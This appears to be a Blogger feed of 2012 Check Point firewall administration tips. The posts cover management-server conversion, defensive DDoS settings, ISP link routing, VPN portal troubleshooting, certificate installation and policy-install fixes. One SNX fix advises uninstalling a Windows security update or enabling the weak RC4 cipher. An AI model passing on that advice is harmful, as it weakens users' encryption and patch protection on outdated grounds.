This is a management server (MNG), so you can't export it and import it to a standalone firewall machine;<br />
let's make the system believe that it is also a firewall with the command<br />
# cpprod_util FwSetFirewallModule 1<br />
Check it via # cpprod_util FwIsFireWallModule<br />
Close SmartDashboard and log in again; you will see the firewall tab.<br />
Take a new upgrade_export for the UTM box.<br />
You have to install the appliance as the Full HA primary cluster member and then<br />
# cp_conf fullha disable (disables its cluster membership)<br />
import the config, reboot, and<br />
# cp_conf fullha enable (sets it back to a Full HA cluster)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-3NdU6ADHYLg/UB0x8yu19tI/AAAAAAAAAJs/XBgY0kGTiVg/s1600/mngtofullha.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" eda="true" height="227" src="http://4.bp.blogspot.com/-3NdU6ADHYLg/UB0x8yu19tI/AAAAAAAAAJs/XBgY0kGTiVg/s320/mngtofullha.jpg" width="320" /></a></div>
<br />
<br />
That's it, good luck<br />
Cagdas<br />
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-24317363101545927232012-07-26T12:24:00.001+03:002012-07-26T12:24:49.265+03:00<br />
<strong>DDOS Tuning for Checkpoint IPS Blade</strong><br />
These are the main things to check against DDoS-related attacks on Checkpoint,<br />but of course they are not enough for sophisticated layer 7 attack techniques; check out the new Radware-based Checkpoint DDoS appliance, <a href="http://www.checkpoint.com/products/ddos-protector/index.html" target="_blank">DDoS Protector</a>.<br />
<br />
<strong>Aggressive aging:</strong> protection against connection-consuming attacks<br />
<strong>Lower Stateful Inspection timers:</strong> defense against slow attacks<br />
<strong>Geo protection:</strong> rules to block by country and direction of traffic<br />
<strong>Network quota:</strong> limit the number of connections by source IP<br />
<strong>Worm catcher signature:</strong> block known worms (HTTP and CIFS)<br />
<strong>TCP window size enforcement:</strong> small TCP window and flood<br />
<strong>SYN flood protection:</strong> cookie-based validation<br />
<strong>HTTP flooding / UDP flooding:</strong> rate-based blocking<br />
<strong>Non-TCP flooding:</strong> restrict non-TCP traffic from occupying more than a given percentage of an enforcement point's state table<br />
<br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-53967150206188760262012-07-18T15:45:00.001+03:002012-07-18T15:46:31.022+03:00<br />
<strong>Checkpoint Port Based Routing in ISP Redundancy</strong><br />
It is possible to route certain outgoing connections specifically through the first ISP link in ISP Redundancy Load Sharing mode.<br />
Edit $FWDIR/lib/table.def as follows.<br />
By changing it to: no_misp_services_ports = { <500, 17>, <259, 17>, <80,6>}; (each entry is <port, IP protocol>; for example <25,6> stands for SMTP (port 25) over TCP (IP protocol 6)), all outgoing SMTP traffic would go through the first ISP link.<br />
<br />
<br />
Also some tips<br />
Show the currently defined ISP links:<br />
# cpstat fw<br />
Test ISP Redundancy by administratively bringing the link down/up:<br />
# fw isp_link ISP-1 down<br />
# fw isp_link ISP-1 up<br />
<br />
More advanced commands will be in the next release of <a href="http://www.smartsplat.com/" target="_blank">SmartSPLAT</a><br />
<br />Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-71914561554789691502012-07-04T10:47:00.000+03:002012-07-04T10:47:15.610+03:00<br />
<strong>Can't access the Mobile Access Portal, browser keeps loading without giving an error</strong><br />
Look under /opt/CPcvpn-R75.20/log/cvpnd.elg for the reason for the problem.<br />In my case it was showing<br />
Exception: open("/opt/CPcvpn-R75.20/conf/includes/CustomRulesAfter.conf") failed - No such file or directory - CVPND aborting<br />
Manually create the file or files:<br />
touch /opt/CPcvpn-R75.20/conf/includes/CustomRulesAfter.conf<br />touch /opt/CPcvpn-R75.20/conf/includes/CustomRulesBefore.conf<br />
and do a cvpnrestart.<br />
Also check the licenses on both cluster members...<br />
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-75782927025645689392012-06-27T17:07:00.001+03:002012-06-27T17:07:26.391+03:00<br />
<strong>SNX page cannot be displayed error</strong><br />
We have faced this issue again..<br />
<br />
Solution:<br />
Uninstall this update: KB2585542<br />
or<br />
Change the Encryption setting from<br />AES, 3DES to AES, 3DES, RC4<br />in the Global Settings for Remote Access / SSL Network Extender,<br />then install the policy to the gateway.<br />
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-58245536428533090452012-06-14T21:10:00.000+03:002012-07-26T12:26:26.580+03:00<br />
<strong>Packet (ping) latency through Checkpoint Firewall</strong><br />
Check the anti-spoofing settings and be sure they are configured on all interfaces; also check the SecureXL settings.<br />
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-23075041836248041772012-06-14T21:08:00.003+03:002012-06-14T21:08:50.258+03:00<br />
<strong>How to Install a public CA to Mobile Access / Connectra</strong><br />
1. Generate the CSR<br />-------------------------------<br />Run "csr_gen &lt;filename&gt;" and follow the instructions.<br />!NOTE! If the files &lt;filename&gt;.csr and .key already exist, they are overwritten without warning!<br />
Output:<br />-> &lt;filename&gt;.key (keyfile)<br />This is the private key. You are asked whether you want to protect this file with a passphrase; please do so. Protect this file and keep it secure.<br />You need this file and the passphrase later to install the certificate.<br />-> &lt;filename&gt;.csr<br />
This is the certificate signing request that you have to send to your CA.<br />You will receive the signed certificate from your CA (certfile).<br />
<br />2. Convert certfile to PEM format<br />-----------------------------------------------------------<br />If the file you receive from your CA is in p12 or pfx format, convert it into PEM format (sk30997):<br />
$CVPNDIR/bin/p12ToPem &lt;input-filename(.p12 /<br />
e.g. $CVPNDIR/bin/p12ToPem cert.pfx<br />
If the file you receive from your CA is in p7b, spc or PKCS#7 format, convert it into PEM format:<br />
$CVPNDIR/bin/p7bToPem &lt;filename (.p7b, .spc, ...)&gt; &lt;output filename (.crt)&gt;<br />
e.g. $CVPNDIR/bin/p7bToPem cert.p7b cert.crt<br />
Output:<br />-> certfile in PEM format &lt;filename&gt;.crt<br />
<br />3. Install the generated certificate<br />--------------------------------------------------<br />Use this command to install the previously generated certificate:<br />
$CVPNDIR/bin/InstallCert &lt;certfile&gt; &lt;keyfile&gt; '&lt;passphrase&gt;'<br />
4. Restart the daemon<br />----------------------------<br />Run "cvpnrestart" on the gateway.<br />
<br />Repeat steps 3 and 4 on each member.<br />Finally, reinstall the policy to the cluster.<br />
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.comtag:blogger.com,1999:blog-4695188025510390210.post-62542012212879480742012-06-10T14:24:00.004+03:002012-09-18T00:12:36.196+03:00<br />
<strong>Policy Install Load on Module Failed</strong><br />
Last week I was dealing with a policy installation problem,<br />
fwm.elg was pointing to a duplicate fw object name and some certificate-related problems..<br />
After placing the upgrade_export on a VM test machine, I saw that I could install the policy on it, so I decided to reset SIC on both members one by one, and this resolved our problem.<br />
<br />
<a href="http://www.smartsplat.com/" target="_blank">SmartSPLAT</a> may help you to examine this type of problem..<br />
Load the policy onto the firewall:<br />
# fwm load $FWDIR/conf/Standard.W FirewallName > /var/tmp/policy_install.ctl 2>&1<br />
Also try<br />
Fetching the policy from the SMC:<br />
# fw fetch SMCName<br />
and fetching locally:<br />
# fw -d fetchlocal -d $FWDIR/state/__tmp/FW1/<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-zFTAQmhDxME/T9SDaOKNV2I/AAAAAAAAAJQ/V30M0txSTIY/s1600/policyinstall.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" fba="true" height="121" src="http://3.bp.blogspot.com/-zFTAQmhDxME/T9SDaOKNV2I/AAAAAAAAAJQ/V30M0txSTIY/s640/policyinstall.jpg" width="640" /></a></div>
<div style="text-align: center;">
<a href="http://www.smartsplat.com/"><span style="font-family: Verdana, sans-serif; font-size: x-small;">www.smartsplat.com</span></a></div>
Cagdas Ulucan OSCP CCSE+ CCMSE+VSXhttp://www.blogger.com/profile/08631933224334223426noreply@blogger.com